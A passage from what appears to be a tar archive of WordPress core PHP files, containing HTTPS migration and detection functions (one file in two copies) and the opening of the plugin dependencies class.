&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260606165331-20260621081107-20260621180940.php 0000666 00000013341 15224151220 0014730 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605091014-20260621081103.php 0000666 00000011205 15224151220 0013341 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605225728.php 0000666 00000011205 15224151220 0011777 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-plugin-dependencies.php 0000666 00000061343 15224151220 0012733 0 ustar 00 <?php
/**
* WordPress Plugin Administration API: WP_Plugin_Dependencies class
*
* @package WordPress
* @subpackage Administration
* @since 6.5.0
*/
/**
* Core class for installing plugin dependencies.
*
* It is designed to add plugin dependencies as designated in the
* `Requires Plugins` header to a new view in the plugins install page.
*/
class WP_Plugin_Dependencies {
/**
* Holds 'get_plugins()'.
*
* @since 6.5.0
*
* @var array
*/
protected static $plugins;
/**
* Holds plugin directory names to compare with cache.
*
* @since 6.5.0
*
* @var array
*/
protected static $plugin_dirnames;
/**
* Holds sanitized plugin dependency slugs.
*
* Keyed on the dependent plugin's filepath,
* relative to the plugins directory.
*
* @since 6.5.0
*
* @var array
*/
protected static $dependencies;
/**
* Holds an array of sanitized plugin dependency slugs.
*
* @since 6.5.0
*
* @var array
*/
protected static $dependency_slugs;
/**
* Holds an array of dependent plugin slugs.
*
* Keyed on the dependent plugin's filepath,
* relative to the plugins directory.
*
* @since 6.5.0
*
* @var array
*/
protected static $dependent_slugs;
/**
* Holds 'plugins_api()' data for plugin dependencies.
*
* @since 6.5.0
*
* @var array
*/
protected static $dependency_api_data;
/**
* Holds plugin dependency filepaths, relative to the plugins directory.
*
* Keyed on the dependency's slug.
*
* @since 6.5.0
*
* @var string[]
*/
protected static $dependency_filepaths;
/**
* An array of circular dependency pairings.
*
* @since 6.5.0
*
* @var array[]
*/
protected static $circular_dependencies_pairs;
/**
* An array of circular dependency slugs.
*
* @since 6.5.0
*
* @var string[]
*/
protected static $circular_dependencies_slugs;
/**
* Whether Plugin Dependencies have been initialized.
*
* @since 6.5.0
*
* @var bool
*/
protected static $initialized = false;
/**
* Initializes by fetching plugin header and plugin API data.
*
* @since 6.5.0
*/
public static function initialize() {
if ( false === self::$initialized ) {
self::read_dependencies_from_plugin_headers();
self::get_dependency_api_data();
self::$initialized = true;
}
}
/**
* Determines whether the plugin has plugins that depend on it.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return bool Whether the plugin has plugins that depend on it.
*/
public static function has_dependents( $plugin_file ) {
return in_array( self::convert_to_slug( $plugin_file ), (array) self::$dependency_slugs, true );
}
/**
* Determines whether the plugin has plugin dependencies.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return bool Whether a plugin has plugin dependencies.
*/
public static function has_dependencies( $plugin_file ) {
return isset( self::$dependencies[ $plugin_file ] );
}
/**
* Determines whether the plugin has active dependents.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return bool Whether the plugin has active dependents.
*/
public static function has_active_dependents( $plugin_file ) {
require_once ABSPATH . 'wp-admin/includes/plugin.php';
$dependents = self::get_dependents( self::convert_to_slug( $plugin_file ) );
foreach ( $dependents as $dependent ) {
if ( is_plugin_active( $dependent ) ) {
return true;
}
}
return false;
}
/**
* Gets filepaths of plugins that require the dependency.
*
* @since 6.5.0
*
* @param string $slug The dependency's slug.
* @return array An array of dependent plugin filepaths, relative to the plugins directory.
*/
public static function get_dependents( $slug ) {
$dependents = array();
foreach ( (array) self::$dependencies as $dependent => $dependencies ) {
if ( in_array( $slug, $dependencies, true ) ) {
$dependents[] = $dependent;
}
}
return $dependents;
}
/**
* Gets the slugs of plugins that the dependent requires.
*
* @since 6.5.0
*
* @param string $plugin_file The dependent plugin's filepath, relative to the plugins directory.
* @return array An array of dependency plugin slugs.
*/
public static function get_dependencies( $plugin_file ) {
if ( isset( self::$dependencies[ $plugin_file ] ) ) {
return self::$dependencies[ $plugin_file ];
}
return array();
}
/**
* Gets a dependent plugin's filepath.
*
* @since 6.5.0
*
* @param string $slug The dependent plugin's slug.
* @return string|false The dependent plugin's filepath, relative to the plugins directory,
* or false if the plugin has no dependencies.
*/
public static function get_dependent_filepath( $slug ) {
$filepath = array_search( $slug, self::$dependent_slugs, true );
return $filepath ? $filepath : false;
}
/**
* Determines whether the plugin has unmet dependencies.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return bool Whether the plugin has unmet dependencies.
*/
public static function has_unmet_dependencies( $plugin_file ) {
if ( ! isset( self::$dependencies[ $plugin_file ] ) ) {
return false;
}
require_once ABSPATH . 'wp-admin/includes/plugin.php';
foreach ( self::$dependencies[ $plugin_file ] as $dependency ) {
$dependency_filepath = self::get_dependency_filepath( $dependency );
if ( false === $dependency_filepath || is_plugin_inactive( $dependency_filepath ) ) {
return true;
}
}
return false;
}
/**
* Determines whether the plugin has a circular dependency.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return bool Whether the plugin has a circular dependency.
*/
public static function has_circular_dependency( $plugin_file ) {
if ( ! is_array( self::$circular_dependencies_slugs ) ) {
self::get_circular_dependencies();
}
if ( ! empty( self::$circular_dependencies_slugs ) ) {
$slug = self::convert_to_slug( $plugin_file );
if ( in_array( $slug, self::$circular_dependencies_slugs, true ) ) {
return true;
}
}
return false;
}
/**
* Gets the names of plugins that require the plugin.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return array An array of dependent names.
*/
public static function get_dependent_names( $plugin_file ) {
$dependent_names = array();
$plugins = self::get_plugins();
$slug = self::convert_to_slug( $plugin_file );
foreach ( self::get_dependents( $slug ) as $dependent ) {
$dependent_names[ $dependent ] = $plugins[ $dependent ]['Name'];
}
sort( $dependent_names );
return $dependent_names;
}
/**
* Gets the names of plugins required by the plugin.
*
* @since 6.5.0
*
* @param string $plugin_file The dependent plugin's filepath, relative to the plugins directory.
* @return array An array of dependency names.
*/
public static function get_dependency_names( $plugin_file ) {
$dependency_api_data = self::get_dependency_api_data();
$dependencies = self::get_dependencies( $plugin_file );
$plugins = self::get_plugins();
$dependency_names = array();
foreach ( $dependencies as $dependency ) {
// Use the name if it's available, otherwise fall back to the slug.
if ( isset( $dependency_api_data[ $dependency ]['name'] ) ) {
$name = $dependency_api_data[ $dependency ]['name'];
} else {
$dependency_filepath = self::get_dependency_filepath( $dependency );
if ( false !== $dependency_filepath ) {
$name = $plugins[ $dependency_filepath ]['Name'];
} else {
$name = $dependency;
}
}
$dependency_names[ $dependency ] = $name;
}
return $dependency_names;
}
/**
* Gets the filepath for a dependency, relative to the plugin's directory.
*
* @since 6.5.0
*
* @param string $slug The dependency's slug.
* @return string|false If installed, the dependency's filepath relative to the plugins directory, otherwise false.
*/
public static function get_dependency_filepath( $slug ) {
$dependency_filepaths = self::get_dependency_filepaths();
if ( ! isset( $dependency_filepaths[ $slug ] ) ) {
return false;
}
return $dependency_filepaths[ $slug ];
}
/**
* Returns API data for the dependency.
*
* @since 6.5.0
*
* @param string $slug The dependency's slug.
* @return array|false The dependency's API data on success, otherwise false.
*/
public static function get_dependency_data( $slug ) {
$dependency_api_data = self::get_dependency_api_data();
if ( isset( $dependency_api_data[ $slug ] ) ) {
return $dependency_api_data[ $slug ];
}
return false;
}
/**
* Displays an admin notice if dependencies are not installed.
*
* @since 6.5.0
*/
public static function display_admin_notice_for_unmet_dependencies() {
if ( in_array( false, self::get_dependency_filepaths(), true ) ) {
$error_message = __( 'Some required plugins are missing or inactive.' );
if ( is_multisite() ) {
if ( current_user_can( 'manage_network_plugins' ) ) {
$error_message .= ' ' . sprintf(
/* translators: %s: Link to the network plugins page. */
__( '<a href="%s">Manage plugins</a>.' ),
esc_url( network_admin_url( 'plugins.php' ) )
);
} else {
$error_message .= ' ' . __( 'Please contact your network administrator.' );
}
} elseif ( 'plugins' !== get_current_screen()->base ) {
$error_message .= ' ' . sprintf(
/* translators: %s: Link to the plugins page. */
__( '<a href="%s">Manage plugins</a>.' ),
esc_url( admin_url( 'plugins.php' ) )
);
}
wp_admin_notice(
$error_message,
array(
'type' => 'warning',
)
);
}
}
/**
* Displays an admin notice if circular dependencies are installed.
*
* @since 6.5.0
*/
public static function display_admin_notice_for_circular_dependencies() {
$circular_dependencies = self::get_circular_dependencies();
if ( ! empty( $circular_dependencies ) && count( $circular_dependencies ) > 1 ) {
$circular_dependencies = array_unique( $circular_dependencies, SORT_REGULAR );
$plugins = self::get_plugins();
$plugin_dirnames = self::get_plugin_dirnames();
// Build output lines.
$circular_dependency_lines = '';
foreach ( $circular_dependencies as $circular_dependency ) {
$first_filepath = $plugin_dirnames[ $circular_dependency[0] ];
$second_filepath = $plugin_dirnames[ $circular_dependency[1] ];
$circular_dependency_lines .= sprintf(
/* translators: 1: First plugin name, 2: Second plugin name. */
'<li>' . _x( '%1$s requires %2$s', 'The first plugin requires the second plugin.' ) . '</li>',
'<strong>' . esc_html( $plugins[ $first_filepath ]['Name'] ) . '</strong>',
'<strong>' . esc_html( $plugins[ $second_filepath ]['Name'] ) . '</strong>'
);
}
wp_admin_notice(
sprintf(
'<p>%1$s</p><ul>%2$s</ul><p>%3$s</p>',
__( 'These plugins cannot be activated because their requirements are invalid.' ),
$circular_dependency_lines,
__( 'Please contact the plugin authors for more information.' )
),
array(
'type' => 'warning',
'paragraph_wrap' => false,
)
);
}
}
/**
* Checks plugin dependencies after a plugin is installed via AJAX.
*
* @since 6.5.0
*/
public static function check_plugin_dependencies_during_ajax() {
check_ajax_referer( 'updates' );
if ( empty( $_POST['slug'] ) ) {
wp_send_json_error(
array(
'slug' => '',
'pluginName' => '',
'errorCode' => 'no_plugin_specified',
'errorMessage' => __( 'No plugin specified.' ),
)
);
}
$slug = sanitize_key( wp_unslash( $_POST['slug'] ) );
$status = array( 'slug' => $slug );
self::get_plugins();
self::get_plugin_dirnames();
if ( ! isset( self::$plugin_dirnames[ $slug ] ) ) {
$status['errorCode'] = 'plugin_not_installed';
$status['errorMessage'] = __( 'The plugin is not installed.' );
wp_send_json_error( $status );
}
$plugin_file = self::$plugin_dirnames[ $slug ];
$status['pluginName'] = self::$plugins[ $plugin_file ]['Name'];
$status['plugin'] = $plugin_file;
if ( current_user_can( 'activate_plugin', $plugin_file ) && is_plugin_inactive( $plugin_file ) ) {
$status['activateUrl'] = add_query_arg(
array(
'_wpnonce' => wp_create_nonce( 'activate-plugin_' . $plugin_file ),
'action' => 'activate',
'plugin' => $plugin_file,
),
is_multisite() ? network_admin_url( 'plugins.php' ) : admin_url( 'plugins.php' )
);
}
if ( is_multisite() && current_user_can( 'manage_network_plugins' ) ) {
$status['activateUrl'] = add_query_arg( array( 'networkwide' => 1 ), $status['activateUrl'] );
}
self::initialize();
$dependencies = self::get_dependencies( $plugin_file );
if ( empty( $dependencies ) ) {
$status['message'] = __( 'The plugin has no required plugins.' );
wp_send_json_success( $status );
}
require_once ABSPATH . 'wp-admin/includes/plugin.php';
$inactive_dependencies = array();
foreach ( $dependencies as $dependency ) {
if ( false === self::$plugin_dirnames[ $dependency ] || is_plugin_inactive( self::$plugin_dirnames[ $dependency ] ) ) {
$inactive_dependencies[] = $dependency;
}
}
if ( ! empty( $inactive_dependencies ) ) {
$inactive_dependency_names = array_map(
function ( $dependency ) {
if ( isset( self::$dependency_api_data[ $dependency ]['Name'] ) ) {
$inactive_dependency_name = self::$dependency_api_data[ $dependency ]['Name'];
} else {
$inactive_dependency_name = $dependency;
}
return $inactive_dependency_name;
},
$inactive_dependencies
);
$status['errorCode'] = 'inactive_dependencies';
$status['errorMessage'] = sprintf(
/* translators: %s: A list of inactive dependency plugin names. */
__( 'The following plugins must be activated first: %s.' ),
implode( ', ', $inactive_dependency_names )
);
$status['errorData'] = array_combine( $inactive_dependencies, $inactive_dependency_names );
wp_send_json_error( $status );
}
$status['message'] = __( 'All required plugins are installed and activated.' );
wp_send_json_success( $status );
}
/**
* Gets data for installed plugins.
*
* @since 6.5.0
*
* @return array An array of plugin data.
*/
protected static function get_plugins() {
if ( is_array( self::$plugins ) ) {
return self::$plugins;
}
require_once ABSPATH . 'wp-admin/includes/plugin.php';
self::$plugins = get_plugins();
return self::$plugins;
}
/**
* Reads and stores dependency slugs from a plugin's 'Requires Plugins' header.
*
* @since 6.5.0
*/
protected static function read_dependencies_from_plugin_headers() {
self::$dependencies = array();
self::$dependency_slugs = array();
self::$dependent_slugs = array();
$plugins = self::get_plugins();
foreach ( $plugins as $plugin => $header ) {
if ( '' === $header['RequiresPlugins'] ) {
continue;
}
$dependency_slugs = self::sanitize_dependency_slugs( $header['RequiresPlugins'] );
self::$dependencies[ $plugin ] = $dependency_slugs;
self::$dependency_slugs = array_merge( self::$dependency_slugs, $dependency_slugs );
$dependent_slug = self::convert_to_slug( $plugin );
self::$dependent_slugs[ $plugin ] = $dependent_slug;
}
self::$dependency_slugs = array_unique( self::$dependency_slugs );
}
/**
* Sanitizes slugs.
*
* @since 6.5.0
*
* @param string $slugs A comma-separated string of plugin dependency slugs.
* @return array An array of sanitized plugin dependency slugs.
*/
protected static function sanitize_dependency_slugs( $slugs ) {
$sanitized_slugs = array();
$slugs = explode( ',', $slugs );
foreach ( $slugs as $slug ) {
$slug = trim( $slug );
/**
* Filters a plugin dependency's slug before matching to
* the WordPress.org slug format.
*
* Can be used to switch between free and premium plugin slugs, for example.
*
* @since 6.5.0
*
* @param string $slug The slug.
*/
$slug = apply_filters( 'wp_plugin_dependencies_slug', $slug );
// Match to WordPress.org slug format.
if ( preg_match( '/^[a-z0-9]+(-[a-z0-9]+)*$/mu', $slug ) ) {
$sanitized_slugs[] = $slug;
}
}
$sanitized_slugs = array_unique( $sanitized_slugs );
sort( $sanitized_slugs );
return $sanitized_slugs;
}
/**
* Gets the filepath of installed dependencies.
* If a dependency is not installed, the filepath defaults to false.
*
* @since 6.5.0
*
* @return array An array of install dependencies filepaths, relative to the plugins directory.
*/
protected static function get_dependency_filepaths() {
if ( is_array( self::$dependency_filepaths ) ) {
return self::$dependency_filepaths;
}
if ( null === self::$dependency_slugs ) {
return array();
}
self::$dependency_filepaths = array();
$plugin_dirnames = self::get_plugin_dirnames();
foreach ( self::$dependency_slugs as $slug ) {
if ( isset( $plugin_dirnames[ $slug ] ) ) {
self::$dependency_filepaths[ $slug ] = $plugin_dirnames[ $slug ];
continue;
}
self::$dependency_filepaths[ $slug ] = false;
}
return self::$dependency_filepaths;
}
/**
* Retrieves and stores dependency plugin data from the WordPress.org Plugin API.
*
* @since 6.5.0
*
* @global string $pagenow The filename of the current screen.
*
* @return array|void An array of dependency API data, or void on early exit.
*/
protected static function get_dependency_api_data() {
global $pagenow;
if ( ! is_admin() || ( 'plugins.php' !== $pagenow && 'plugin-install.php' !== $pagenow ) ) {
return;
}
if ( is_array( self::$dependency_api_data ) ) {
return self::$dependency_api_data;
}
$plugins = self::get_plugins();
self::$dependency_api_data = (array) get_site_transient( 'wp_plugin_dependencies_plugin_data' );
foreach ( self::$dependency_slugs as $slug ) {
